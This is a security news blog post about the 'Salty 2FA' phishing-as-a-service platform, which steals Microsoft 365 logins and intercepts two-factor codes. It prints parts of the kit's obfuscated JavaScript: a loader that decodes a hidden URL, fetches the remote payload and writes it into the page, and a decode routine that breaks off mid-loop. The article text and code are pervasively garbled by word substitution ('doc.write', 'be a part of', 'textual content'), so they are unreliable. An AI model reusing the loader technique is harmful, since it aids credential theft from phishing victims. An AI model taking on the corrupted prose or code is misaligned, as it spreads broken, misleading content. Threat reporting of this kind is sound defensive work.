Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

New Salty 2FA PhaaS platform Attacking Microsoft 365 Users to Steal Login Credentials

Posted on August 20, 2025August 20, 2025 By CWS

A complicated new Phishing-as-a-Service (PhaaS) framework dubbed “Salty 2FA” has emerged as a big risk to Microsoft 365 customers throughout US and European industries.

This beforehand undocumented platform employs superior obfuscation methods and multi-stage execution chains particularly designed to bypass two-factor authentication mechanisms whereas stealing company credentials.

The framework targets organizations spanning finance, telecommunications, vitality, logistics, and academic sectors by means of fastidiously crafted phishing campaigns.

The malware distinguishes itself by means of a singular area infrastructure sample that mixes compound domains in “.com” zones with domains registered underneath Russian “.ru” top-level domains.

Suspicious area mixture (Supply – Any.Run)

This distinctive pairing creates a posh net of redirections and payload supply mechanisms which have helped the platform evade conventional detection programs.

Victims obtain phishing emails containing varied lures together with pretend voice messages, doc entry requests, and billing statements that redirect them to convincing Microsoft login replicas.

ANY.RUN analysts recognized this beforehand unknown PhaaS framework throughout routine phishing marketing campaign looking once they found a number of sandbox classes exhibiting comparable behavioral patterns regardless of utilizing completely different domains and obfuscation methods.

Evaluation of a phishing web page (Supply – Any.Run)

The constant use of Cloudflare Turnstile safety mixed with the distinctive area pairing initially flagged these campaigns as doubtlessly associated, resulting in the great evaluation that exposed Salty 2FA’s full capabilities.

The platform demonstrates regarding sophistication in its capacity to intercept and course of a number of two-factor authentication strategies, together with push notifications, SMS codes, voice calls, and authenticator app tokens.

This functionality extends the assault past easy credential theft, permitting risk actors to take care of persistent entry to compromised accounts even when conventional 2FA protections are in place.

Multi-Stage Execution Chain and Obfuscation Strategies

Salty 2FA’s technical structure depends on a fastidiously orchestrated five-stage execution course of designed to withstand evaluation and detection.

Obfuscated code (Supply – Any.Run)

The preliminary stage begins with an obfuscated JavaScript operate that serves because the entry level, containing inspirational quote feedback as noise to complicate static evaluation.

async operate vitals() {
operate whiz (math) {
return […atob (math)].map((lewd, matchmaking, recklessness) =>
recklessness[0] ? String.fromCharCode((lewd.charCodeAt(0)-
recklessness[0].charCodeAt(0)+256)%256):””).be a part of(“”);
}
if(sessionStorage[0]){
doc.write(whiz(sessionStorage[0]));
return;
}
unearned = await(await fetch(await whiz(`1PwICAQHzsPDAfUG//kIBAD19/nGyPn9wgYJw8M=`))).textual content();
doc.write(await whiz(unearned));
sessionStorage[0] = unearned;
}

The framework employs subtle component ID encoding utilizing Base64 and XOR operations with a set generated worth, making dynamic evaluation considerably tougher.

All front-end logic depends on jQuery calls to dynamically generated component identifiers, which have to be decoded by means of a devoted routine earlier than manipulation.

operate decode(s) {
attempt {
var r=””;
r = atob(s);
var d = ”;
for (var i = 0; i

The platform incorporates a number of anti-analysis mechanisms together with keyboard shortcut blocking for debugging instruments and execution time measurement to detect managed environments.

Information exfiltration makes use of the identical XOR method with session-derived keys, whereas stolen credentials are transmitted to Russian-hosted servers by means of encoded POST requests containing each the encrypted information and decoding parameters.

Enhance your SOC and assist your crew defend what you are promoting with free top-notch risk intelligence: Request TI Lookup Premium Trial.

Cyber Security News Tags:2FA, Attacking, Credentials, Login, Microsoft, PhaaS, Platform, Salty, Steal, Users

Post navigation

Previous Post: DOJ Charges 22-Year-Old for Running RapperBot Botnet Behind 370,000 DDoS Attacks
Next Post: Chrome High-Severity Vulnerability Let Attackers Crash Browser or Execute Arbitrary Code

Related Posts

McLaren Health Care Data Breach Exposes 743,000 People Personal Information Cyber Security News
Microsoft Outlook’s New Two-Click View for Encrypted Emails Protects From Accidental Exposure Cyber Security News
Beware of Weaponized Wedding Invite Scams That Deploys SpyMax RAT on Android Devices Cyber Security News
FileFix Attack Exploits Windows Browser Features to Bypass Mark-of-the-Web Protection Cyber Security News
Weaponized DMV-Themed Phishing Attacking U.S. Citizens to Harvest Personal and Financial Data Cyber Security News
CISA Warns of Microsoft SharePoint server 0-Day RCE Vulnerability Exploited in Wild Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Hackers Weaponize Active Directory Federation Services and office.com to Steal Microsoft 365 logins
  • A Free Zero Trust Web Application Firewall for 2026
  • How Businesses Stop Complex Social Engineering Attacks Early
  • GPT-5 Has a Vulnerability: Its Router Can Send You to Older, Less Safe Models
  • Slow and Steady Security: Lessons from the Tortoise and the Hare

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Hackers Weaponize Active Directory Federation Services and office.com to Steal Microsoft 365 logins
  • A Free Zero Trust Web Application Firewall for 2026
  • How Businesses Stop Complex Social Engineering Attacks Early
  • GPT-5 Has a Vulnerability: Its Router Can Send You to Older, Less Safe Models
  • Slow and Steady Security: Lessons from the Tortoise and the Hare

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News